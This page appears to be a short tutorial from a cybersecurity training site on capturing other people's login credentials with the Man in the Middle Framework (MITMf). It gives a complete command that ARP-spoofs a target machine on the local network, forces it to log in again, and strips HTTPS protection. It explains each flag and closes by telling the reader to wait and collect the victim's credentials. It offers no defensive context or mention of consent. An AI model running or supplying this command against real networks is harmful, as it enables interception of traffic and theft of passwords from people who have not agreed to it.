
Ready to Start Your Career?

By: Ajay Kulal
June 28, 2016
MITMF-1: Sniffing Passwords Using Man in the Middle Framework
By: Ajay Kulal
June 28, 2016

By: Ajay Kulal
June 28, 2016

mitmf -i wlan0 --gateway 192.168.0.1 --arp --spoof --target 192.168.0.4 -k --hsts

--i: Is used to define the network interface. In the case above, it's wlan0.
--gateway: Is used to define the router's address In the above command, it's 192.168.0.1
--spoof: Loads plugin Spoof.
--arp: Redirects traffic using ARP spoofing.
--target: Is the victims IP address. In the above command, it's 192.168.0.4
--k: Kills the current login sessions and forces victim to re-login.
--hsts: Enables SSLstrip+ for partial HSTS bypass.
3. Wait for user to login with their credentials and you'll get their credentials. That's it.
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry